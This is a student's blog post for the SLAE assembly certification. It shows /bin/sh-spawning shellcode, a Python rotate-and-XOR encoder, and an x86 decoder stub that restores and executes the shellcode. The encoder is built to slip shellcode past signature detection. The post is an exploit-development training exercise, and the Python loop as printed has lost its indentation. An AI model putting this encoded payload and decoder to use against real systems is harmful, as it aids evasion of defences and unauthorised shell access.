June 4, 2019

SLAE – Assignment #4 - Custom Encoder

This task was to follow our lab video and build an insertion encoding scheme for our shellcode which spawned /bin/sh.

1. Encoder


I decided to use python for encoding. I chose bitwise feedback rotation left function and XOR against known key. Hopefully code is clear for understanding:

#!/usr/bin/python

sc = ("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

max_bits = 8

key_byte = 0x32

final = ""

rotate_left = lambda byte, value, max_bits: \
    (byte << value%max_bits) & (2**max_bits-1) | \
    ((byte & (2**max_bits-1)) >> (max_bits-(value%max_bits)))

for byte in bytearray(sc) :

rotl_byte = rotate_left(byte, 4, max_bits)
xor_byte = rotl_byte ^ key_byte

final += '0x'
final += '%02x,' % (xor_byte & 0xff)

print (final)

print 'Length: %d' % len(bytearray(sc))



I got an output:

0x21,0x3e,0x37,0xb4,0xd4,0xc0,0x05,0xb4,0xb4,0xc0,0xc0,0x14,0xa4,0xaa,0x0c,0x37,0xaa,0x1c,0x07,0xaa,0x2c,0x39,0x82,0xee,0x3a

2. Decoding


To decode I used jmp-call-pop combination to get address of the shellcode. Decoder assembly code below:

global _start

_start:
jmp short get_addr

prep_decode:
pop esi                 ; address now in esi
xor ecx, ecx
mov cl, len ; shellcode length was counter

decode:
         ; we decoded by using function backward

xor byte [esi], 0x32  ; xor with the key
ror byte [esi], 4        ; rotate right 4 positions (opposite operation to encoding) 
inc esi ; next byte
loop decode            ; until cl is zero

jmp short sc            ; jump to the original shellcode


get_addr:
call prep_decode
sc: db 0x21,0x3e,0x37,0xb4,0xd4,0xc0,0x05,0xb4,0xb4,0xc0,0xc0,0x14,0xa4,0xaa,0x0c,0x37,0xaa,0x1c,0x07,0xaa,0x2c,0x39,0x82,0xee,0x3a
len equ $-sc:

Proof picture:


3. Disclaimer


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


Student ID: SLAE-764

All the code from this article can be found in my github repository - https://github.com/vinegrep/SLAE-exam

No comments:

Post a Comment